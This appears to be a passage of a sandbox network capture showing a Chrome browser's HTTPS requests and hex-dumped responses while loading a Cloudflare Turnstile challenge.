                                                                                      CF-RAY: 8ff194b9593ac342-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:11:02 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                      Data Ascii: invalid


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.1649733104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:02 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8ff194a8eb4842ec/1736395861048/f9f80bbbf521086628021de98408b367f83ff438cb61ab1bcf16bf67eb9bd1d0/rQfzELCojb_dIXk HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      Cache-Control: max-age=0
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:02 UTC143INHTTP/1.1 401 Unauthorized
                                                                                      Date: Thu, 09 Jan 2025 04:11:02 GMT
                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                      Content-Length: 1
                                                                                      Connection: close
                                                                                      2025-01-09 04:11:02 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 2d 66 67 4c 75 5f 55 68 43 47 59 6f 41 68 33 70 68 41 69 7a 5a 5f 67 5f 39 44 6a 4c 59 61 73 62 7a 78 61 5f 5a 2d 75 62 30 64 41 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                      Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g-fgLu_UhCGYoAh3phAizZ_g_9DjLYasbzxa_Z-ub0dAAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                      2025-01-09 04:11:02 UTC1INData Raw: 4a
                                                                                      Data Ascii: J


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.1649735104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:03 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8ff194a8eb4842ec/1736395861052/t2RBxqreWkaI5Yq HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: image
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:03 UTC200INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:11:03 GMT
                                                                                      Content-Type: image/png
                                                                                      Content-Length: 61
                                                                                      Connection: close
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194c2ed705e6d-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:11:03 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 25 08 02 00 00 00 e7 7d af fd 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                      Data Ascii: PNGIHDR%}IDAT$IENDB`


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.1649737104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:04 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8ff194a8eb4842ec/1736395861052/t2RBxqreWkaI5Yq HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:04 UTC200INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:11:04 GMT
                                                                                      Content-Type: image/png
                                                                                      Content-Length: 61
                                                                                      Connection: close
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194c6eee04369-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:11:04 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 25 08 02 00 00 00 e7 7d af fd 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                      Data Ascii: PNGIHDR%}IDAT$IENDB`


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.1649738104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:04 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/737767898:1736393568:3GPIqup9T1FWapXQwnp-3xlwBm1zENfI7dv9-dEVSYI/8ff194a8eb4842ec/D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 32355
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                      CF-Chl-RetryAttempt: 0
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      CF-Challenge: D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Origin: https://challenges.cloudflare.com
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/vjglw/0x4AAAAAAA0rfpQOBx227C7S/auto/fbE/normal/auto/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:04 UTC16384OUTData Raw: 76 5f 38 66 66 31 39 34 61 38 65 62 34 38 34 32 65 63 3d 71 38 54 24 2d 74 25 32 62 59 69 74 69 4f 54 4f 67 2b 48 49 54 24 34 54 2b 5a 46 32 46 75 46 50 24 55 31 46 37 6f 46 4a 24 67 64 74 32 74 46 44 24 46 51 65 74 63 54 46 71 74 77 4b 67 54 4f 48 46 2d 24 74 42 69 4b 46 70 64 74 6c 46 43 6a 31 24 56 46 77 4b 4f 37 46 4b 4b 46 67 65 35 49 54 4f 32 46 75 4e 4e 69 46 41 24 4f 31 69 46 6b 24 4f 5a 46 68 61 42 59 46 6e 24 4f 56 38 67 79 43 46 72 50 33 46 67 68 69 45 46 55 49 49 74 73 46 45 53 74 31 69 69 4b 46 51 24 46 6f 46 2b 43 32 46 6b 42 35 6e 37 54 46 70 50 6a 75 4d 6b 35 57 59 31 61 31 69 50 35 6e 35 78 49 32 38 24 4f 52 74 4a 48 31 6c 46 46 42 65 36 75 78 54 42 77 79 58 46 24 54 38 48 77 51 44 35 65 79 43 4b 74 42 68 70 78 53 61 4b 7a 71 77 4b 4e 49
                                                                                      Data Ascii: v_8ff194a8eb4842ec=q8T$-t%2bYitiOTOg+HIT$4T+ZF2FuFP$U1F7oFJ$gdt2tFD$FQetcTFqtwKgTOHF-$tBiKFpdtlFCj1$VFwKO7FKKFge5ITO2FuNNiFA$O1iFk$OZFhaBYFn$OV8gyCFrP3FghiEFUIItsFESt1iiKFQ$FoF+C2FkB5n7TFpPjuMk5WY1a1iP5n5xI28$ORtJH1lFFBe6uxTBwyXF$T8HwQD5eyCKtBhpxSaKzqwKNI
                                                                                      2025-01-09 04:11:04 UTC15971OUTData Raw: 69 4f 54 4f 35 46 54 24 37 24 68 35 46 46 49 41 2b 52 72 24 70 24 67 33 35 59 74 24 46 57 5a 52 54 4f 76 24 6a 30 55 54 53 53 46 61 4d 50 4d 38 24 46 76 35 77 46 74 54 46 37 46 37 69 2b 31 46 59 6b 56 4b 74 79 31 61 30 50 35 2b 72 24 4f 46 6b 38 46 5a 46 39 2d 4f 64 46 74 46 4b 24 52 54 4f 4a 4b 5a 24 54 69 74 73 46 42 24 73 64 2b 42 46 73 24 46 31 2b 4b 46 43 24 6b 6e 74 31 4b 79 24 77 31 4f 45 46 2d 24 67 38 46 31 46 44 24 49 38 74 48 46 6f 47 67 4f 2b 32 24 78 31 4f 61 38 24 46 56 46 65 6c 46 64 2b 30 46 35 54 46 30 46 31 46 2b 4b 46 35 46 6e 46 37 68 2d 56 46 45 46 6b 69 74 55 46 4f 46 73 54 74 31 2b 55 46 71 24 52 74 46 48 24 55 24 55 71 45 63 24 67 69 74 48 46 52 24 71 69 2b 58 46 62 38 52 31 4f 58 46 71 46 4e 31 46 73 46 65 46 46 64 49 64 46 42 37
                                                                                      Data Ascii: iOTO5FT$7$h5FFIA+Rr$p$g35Yt$FWZRTOv$j0UTSSFaMPM8$Fv5wFtTF7F7i+1FYkVKty1a0P5+r$OFk8FZF9-OdFtFK$RTOJKZ$TitsFB$sd+BFs$F1+KFC$knt1Ky$w1OEF-$g8F1FD$I8tHFoGgO+2$x1Oa8$FVFelFd+0F5TF0F1F+KF5FnF7h-VFEFkitUFOFsTt1+UFq$RtFH$U$UqEc$gitHFR$qi+XFb8R1OXFqFN1FsFeFFdIdFB7
                                                                                      2025-01-09 04:11:04 UTC318INHTTP/1.1 200 OK
                                                                                      Date: Thu, 09 Jan 2025 04:11:04 GMT
                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                      Content-Length: 26248
                                                                                      Connection: close
                                                                                      cf-chl-gen: BSEbHmlFk5ICwmN16bn2lk/XW42/ykYMfrNY9pS6/Kz38kOgUogkVZYLK7jOTwVq9Qk=$G4/rUC4LcMqIJtpy
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194c6fa5c0f6f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:11:04 UTC1051INData Raw: 5a 5a 4a 4d 52 35 42 7a 63 58 64 35 65 48 47 48 64 32 69 4b 69 34 2b 63 6f 35 2b 43 64 49 57 6a 68 6e 69 58 6c 70 64 38 72 6d 65 4b 73 70 36 65 6f 37 43 46 70 35 4a 79 69 5a 75 64 6e 4a 69 67 6b 4c 69 42 67 36 4a 2f 78 36 47 69 76 73 4f 6e 72 61 75 6b 73 4b 43 79 6b 64 4b 79 74 4e 65 30 73 38 72 47 76 63 76 58 6e 4a 76 41 6d 39 65 6a 30 39 62 53 79 4e 66 6b 75 61 58 4b 79 37 32 77 33 4f 69 7a 31 4d 50 73 74 66 6a 6b 78 37 69 39 36 72 6a 7a 74 38 38 44 34 62 63 45 34 39 48 6a 34 73 54 68 36 2b 77 44 34 66 76 71 42 75 6a 30 34 2b 62 56 46 76 45 64 33 50 63 41 2f 74 62 62 2b 52 33 32 4a 77 49 48 34 79 50 36 36 77 54 37 4b 76 73 6d 45 78 73 4e 48 53 51 4b 4e 6a 6f 74 39 7a 6a 32 4c 50 6a 78 4f 68 7a 2b 51 44 4a 46 50 6a 34 61 53 69 77 37 4c 44 67 71 4a 78 73
                                                                                      Data Ascii: ZZJMR5BzcXd5eHGHd2iKi4+co5+CdIWjhniXlpd8rmeKsp6eo7CFp5JyiZudnJigkLiBg6J/x6GivsOnrauksKCykdKytNe0s8rGvcvXnJvAm9ej09bSyNfkuaXKy72w3Oiz1MPstfjkx7i96rjzt88D4bcE49Hj4sTh6+wD4fvqBuj04+bVFvEd3PcA/tbb+R32JwIH4yP66wT7KvsmExsNHSQKNjot9zj2LPjxOhz+QDJFPj4aSiw7LDgqJxs
                                                                                      2025-01-09 04:11:04 UTC1369INData Raw: 48 59 6e 78 31 61 57 57 65 68 57 70 76 73 33 79 6a 6c 6f 6d 58 68 58 4e 34 68 4c 61 75 71 36 47 74 64 4a 69 67 70 73 4f 55 6b 61 65 4a 71 49 4f 65 78 36 57 62 76 38 53 52 30 74 62 49 30 4c 65 56 75 71 58 59 6c 4e 76 50 34 5a 66 51 34 4b 47 2b 32 4c 6e 5a 74 72 33 5a 32 39 76 4b 31 36 6e 52 70 4b 57 71 77 38 44 50 36 63 58 33 30 64 71 39 2b 2b 72 31 7a 2f 4c 72 7a 72 38 47 30 2f 48 34 35 65 55 42 34 51 33 6c 32 75 77 51 33 75 72 76 45 67 55 4d 43 4f 7a 5a 39 74 30 61 47 78 55 43 34 42 72 79 37 52 66 39 42 52 37 67 49 77 45 43 49 78 7a 75 4b 79 72 7a 45 42 49 51 49 53 38 6f 46 41 63 4c 4c 2f 63 56 4f 52 4d 35 45 44 5a 41 45 78 42 4b 43 52 68 4c 4f 7a 67 69 47 43 73 62 53 55 56 4e 51 44 63 69 57 69 5a 47 50 56 67 6d 4c 69 41 54 46 42 30 66 59 54 56 6d 49 30
                                                                                      Data Ascii: HYnx1aWWehWpvs3yjlomXhXN4hLauq6GtdJigpsOUkaeJqIOex6Wbv8SR0tbI0LeVuqXYlNvP4ZfQ4KG+2LnZtr3Z29vK16nRpKWqw8DP6cX30dq9++r1z/Lrzr8G0/H45eUB4Q3l2uwQ3urvEgUMCOzZ9t0aGxUC4Bry7Rf9BR7gIwECIxzuKyrzEBIQIS8oFAcLL/cVORM5EDZAExBKCRhLOzgiGCsbSUVNQDciWiZGPVgmLiATFB0fYTVmI0
                                                                                      2025-01-09 04:11:04 UTC1369INData Raw: 69 4b 75 69 67 6f 32 48 6a 5a 53 5a 6d 71 57 58 6d 62 57 6d 76 4c 65 78 6d 34 75 35 74 33 79 43 78 6f 48 46 68 61 65 45 79 4c 79 50 69 62 43 2b 71 4c 4b 72 77 39 44 4e 71 38 57 33 6d 4a 54 4c 71 64 53 2b 74 37 75 6a 30 2b 69 38 35 2b 6a 4b 74 2b 76 4a 77 39 69 70 79 63 7a 53 78 65 36 70 78 65 47 30 79 4f 2f 34 32 77 48 55 36 38 72 39 39 66 37 38 34 41 6e 7a 36 41 6a 44 35 2f 6b 44 79 39 34 4c 34 78 4c 64 37 42 45 4f 31 2f 44 79 38 4e 76 35 2f 41 73 6a 38 4f 4c 33 39 65 50 6b 2b 77 72 34 4b 79 59 59 49 79 63 73 44 52 45 30 36 78 41 69 4b 79 6f 48 4d 77 77 36 38 2f 41 58 50 77 45 5a 2f 55 4d 62 4a 45 6b 64 4e 43 4d 4b 4f 67 68 41 4f 45 64 53 4d 42 35 44 46 55 6f 6d 4e 79 30 7a 4a 52 4e 4d 4a 78 6c 4a 4e 56 49 6a 55 54 4e 66 50 55 4e 43 53 45 30 6f 57 30 56
                                                                                      Data Ascii: iKuigo2HjZSZmqWXmbWmvLexm4u5t3yCxoHFhaeEyLyPibC+qLKrw9DNq8W3mJTLqdS+t7uj0+i85+jKt+vJw9ipyczSxe6pxeG0yO/42wHU68r99f784Anz6AjD5/kDy94L4xLd7BEO1/Dy8Nv5/Asj8OL39ePk+wr4KyYYIycsDRE06xAiKyoHMww68/AXPwEZ/UMbJEkdNCMKOghAOEdSMB5DFUomNy0zJRNMJxlJNVIjUTNfPUNCSE0oW0V
                                                                                      2025-01-09 04:11:04 UTC1369INData Raw: 49 6d 70 68 6f 4f 34 65 5a 69 4b 6b 62 47 4e 73 63 43 42 6e 37 69 5a 75 5a 4f 6f 78 61 6e 4c 76 72 75 6e 73 59 79 37 73 36 43 73 72 70 4b 6d 32 4a 65 4f 31 37 76 61 75 73 43 2f 76 4b 2f 43 35 64 48 43 31 75 50 69 74 38 6e 67 76 4e 6a 4f 35 61 76 4b 7a 61 37 4b 7a 65 61 31 35 64 4f 30 2f 72 72 74 30 62 30 46 32 67 4c 79 77 50 37 33 35 75 49 41 33 41 6f 45 2b 41 66 37 33 39 4c 48 35 4f 38 54 31 2f 6a 73 42 78 49 57 37 78 73 44 49 42 51 55 42 75 55 44 39 75 45 6d 46 2f 73 45 4b 69 38 70 45 69 38 4a 4e 6a 4d 79 43 6a 59 53 47 44 6b 64 4b 51 6b 6f 50 67 6f 67 51 52 41 78 45 54 42 49 45 69 68 4a 47 6a 6b 5a 4f 46 4a 41 44 69 55 72 46 53 73 55 4b 78 49 4e 4f 69 56 58 57 6a 4d 31 4d 43 42 4d 56 6d 4a 56 53 44 4d 36 4a 30 5a 57 49 47 49 37 51 47 51 38 4a 6d 52 70
                                                                                      Data Ascii: ImphoO4eZiKkbGNscCBn7iZuZOoxanLvrunsYy7s6CsrpKm2JeO17vausC/vK/C5dHC1uPit8ngvNjO5avKza7Kzea15dO0/rrt0b0F2gLywP735uIA3AoE+Af739LH5O8T1/jsBxIW7xsDIBQUBuUD9uEmF/sEKi8pEi8JNjMyCjYSGDkdKQkoPgogQRAxETBIEihJGjkZOFJADiUrFSsUKxINOiVXWjM1MCBMVmJVSDM6J0ZWIGI7QGQ8JmRp
                                                                                      2025-01-09 04:11:04 UTC1369INData Raw: 61 30 6b 48 36 2b 6e 6f 76 43 70 58 6a 42 67 73 4c 41 79 73 6d 74 77 35 7a 44 75 71 47 67 7a 4c 54 4b 6a 38 61 35 31 71 69 54 6c 61 62 55 32 62 62 61 6f 4c 44 4f 78 4f 61 66 6f 61 71 36 75 73 58 65 36 38 58 6b 70 4e 2f 6c 78 2f 66 6a 39 4f 66 76 39 37 7a 56 79 63 6a 78 37 65 50 77 2b 51 4c 32 41 73 63 44 41 64 7a 4b 43 2b 73 4b 44 2f 48 6f 44 67 4d 50 42 65 33 69 2b 41 2f 34 44 77 67 55 38 42 50 2b 2f 64 38 61 2f 66 54 34 2b 51 73 67 46 77 55 5a 49 2b 38 45 48 43 63 56 4a 43 49 54 47 53 67 58 47 52 55 63 47 66 59 68 4c 53 72 36 48 52 30 76 4a 68 45 56 4a 78 6f 70 4c 69 74 45 47 55 77 37 44 42 31 42 4c 67 38 78 56 7a 6f 6e 4c 56 55 32 4b 31 39 54 53 6c 64 62 57 55 5a 44 50 54 35 4b 58 56 59 66 56 7a 74 4a 63 46 70 6e 51 54 46 65 4d 48 4e 59 55 6a 4a 4e 57
                                                                                      Data Ascii: a0kH6+novCpXjBgsLAysmtw5zDuqGgzLTKj8a51qiTlabU2bbaoLDOxOafoaq6usXe68XkpN/lx/fj9Ofv97zVycjx7ePw+QL2AscDAdzKC+sKD/HoDgMPBe3i+A/4DwgU8BP+/d8a/fT4+QsgFwUZI+8EHCcVJCITGSgXGRUcGfYhLSr6HR0vJhEVJxopLitEGUw7DB1BLg8xVzonLVU2K19TSldbWUZDPT5KXVYfVztJcFpnQTFeMHNYUjJNW
                                                                                      2025-01-09 04:11:04 UTC1369INData Raw: 42 6c 59 2b 54 69 4a 32 37 6f 6f 57 65 79 37 7a 47 6b 63 32 4a 77 70 48 43 7a 63 79 5a 73 62 62 4b 6c 39 71 79 31 4a 2b 73 7a 4e 2b 32 76 64 7a 68 73 63 53 37 32 73 4c 76 37 61 69 6e 76 63 76 69 7a 4e 48 78 30 63 37 71 75 75 72 4a 32 62 59 42 31 62 6a 73 38 63 47 34 7a 77 48 61 42 77 30 48 79 65 58 38 42 39 45 44 37 74 44 53 46 65 4d 4a 36 65 55 47 32 2f 49 4d 48 74 66 78 37 64 72 69 38 51 49 49 4a 76 6e 7a 39 2b 77 43 49 41 66 70 37 41 6e 2b 4a 65 73 4e 43 79 77 4d 4b 79 55 33 2b 78 54 31 4c 77 4c 34 4f 6a 66 33 4d 30 49 53 47 6a 73 55 42 79 55 61 4c 78 41 6e 48 52 77 56 4c 46 59 6b 45 69 31 62 4a 44 59 31 4f 6a 42 69 49 6c 38 2f 56 43 59 78 55 57 4d 6f 51 55 52 6c 4b 43 45 37 5a 54 49 70 59 54 4a 48 54 6d 31 79 51 6c 56 4d 61 31 4f 41 66 6a 6b 34 54 6c
                                                                                      Data Ascii: BlY+TiJ27ooWey7zGkc2JwpHCzcyZsbbKl9qy1J+szN+2vdzhscS72sLv7ainvcvizNHx0c7quurJ2bYB1bjs8cG4zwHaBw0HyeX8B9ED7tDSFeMJ6eUG2/IMHtfx7dri8QIIJvnz9+wCIAfp7An+JesNCywMKyU3+xT1LwL4Ojf3M0ISGjsUByUaLxAnHRwVLFYkEi1bJDY1OjBiIl8/VCYxUWMoQURlKCE7ZTIpYTJHTm1yQlVMa1OAfjk4Tl
                                                                                      2025-01-09 04:11:04 UTC1369INData Raw: 69 62 32 48 68 4d 69 2b 69 34 53 79 78 34 2f 53 6f 73 71 55 78 72 4c 49 6a 39 71 71 30 4a 79 55 76 74 6d 67 6d 4d 4c 55 70 4e 62 4b 71 61 6a 45 7a 74 2b 72 37 73 62 6f 73 4b 6a 6b 35 72 4f 77 39 4f 71 35 2b 73 72 73 76 4f 33 42 38 73 41 43 76 66 57 37 42 39 72 36 79 4d 44 38 42 4d 7a 39 30 51 6e 50 45 74 58 56 31 41 66 71 44 64 6a 51 2f 68 50 63 48 77 4d 59 33 39 77 68 47 4f 54 71 34 52 2f 6e 4b 77 73 69 37 53 37 70 4b 4f 63 7a 42 79 76 7a 4e 76 6b 73 2b 50 41 4c 4e 66 73 2f 46 77 49 42 51 67 59 2b 42 55 63 6a 51 41 67 42 50 54 30 4f 43 55 31 44 45 6b 4d 76 53 52 55 78 4b 30 77 5a 57 7a 4d 65 48 56 38 7a 55 53 45 39 4d 31 77 6d 56 7a 74 64 49 47 74 48 58 53 35 4a 59 57 55 79 63 31 4e 6d 4e 6c 4a 31 62 7a 6b 78 62 57 30 2b 57 45 4a 32 51 54 6c 6a 52 6b 61
                                                                                      Data Ascii: ib2HhMi+i4Syx4/SosqUxrLIj9qq0JyUvtmgmMLUpNbKqajEzt+r7sbosKjk5rOw9Oq5+srsvO3B8sACvfW7B9r6yMD8BMz90QnPEtXV1AfqDdjQ/hPcHwMY39whGOTq4R/nKwsi7S7pKOczByvzNvks+PALNfs/FwIBQgY+BUcjQAgBPT0OCU1DEkMvSRUxK0wZWzMeHV8zUSE9M1wmVztdIGtHXS5JYWUyc1NmNlJ1bzkxbW0+WEJ2QTljRka
                                                                                      2025-01-09 04:11:04 UTC1369INData Raw: 4b 6a 4e 77 35 58 46 32 4a 57 55 73 63 57 77 72 63 75 2f 79 70 50 64 6d 64 4f 6c 35 4f 58 58 71 64 6e 73 71 61 6a 45 75 71 71 6a 37 37 48 74 78 63 33 58 34 71 76 70 32 72 50 4b 2f 50 33 65 77 63 76 66 32 4e 4b 38 33 2b 62 4a 77 41 4c 32 79 67 34 4e 7a 64 2f 45 44 76 7a 48 42 68 45 53 35 77 67 53 2f 64 6f 66 36 74 6e 76 2b 52 6f 51 35 64 77 65 43 65 59 71 47 65 6e 36 34 43 6f 50 34 79 49 64 4c 67 4d 6b 4c 68 62 32 4f 77 66 31 44 53 77 35 38 67 4a 44 50 68 34 51 4d 67 4d 63 42 30 73 58 42 68 73 38 52 69 6f 63 50 67 38 6f 46 67 31 4f 4d 69 52 47 47 7a 41 62 58 79 73 61 4c 32 42 61 50 6a 42 53 4a 7a 77 71 49 57 4a 47 4f 46 73 34 52 43 39 7a 50 79 35 44 4c 57 35 53 52 47 64 45 55 44 34 31 64 6c 70 4d 62 31 42 59 51 34 64 54 51 6c 68 69 67 6d 5a 59 65 31 78 6b
                                                                                      Data Ascii: KjNw5XF2JWUscWwrcu/ypPdmdOl5OXXqdnsqajEuqqj77Htxc3X4qvp2rPK/P3ewcvf2NK83+bJwAL2yg4Nzd/EDvzHBhES5wgS/dof6tnv+RoQ5dweCeYqGen64CoP4yIdLgMkLhb2Owf1DSw58gJDPh4QMgMcB0sXBhs8RiocPg8oFg1OMiRGGzAbXysaL2BaPjBSJzwqIWJGOFs4RC9zPy5DLW5SRGdEUD41dlpMb1BYQ4dTQlhigmZYe1xk


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.1649739104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-09 04:11:04 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/737767898:1736393568:3GPIqup9T1FWapXQwnp-3xlwBm1zENfI7dv9-dEVSYI/8ff194a8eb4842ec/D80UIBI30I3Of36qKj9WPaoJyxxHE3GrzrMoeRHCGQo-1736395859-1.1.1.1-Pv8jl5rZqZGTvnlYpWCFoc23AbuyGb6.n9iv_w8ItRvXVrbpcXAyO7Xb.3QVwAJJ HTTP/1.1
                                                                                      Host: challenges.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2025-01-09 04:11:05 UTC379INHTTP/1.1 404 Not Found
                                                                                      Date: Thu, 09 Jan 2025 04:11:05 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 7
                                                                                      Connection: close
                                                                                      cf-chl-out: YdNerJ2mFJDFGYxJqpfHk7bd5vgw+tNt28U=$UynEf8BrL06ZsvaP
                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8ff194cc4ac043e2-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2025-01-09 04:11:05 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                      Data Ascii: invalid


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.1649741104.18.95.414437128C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
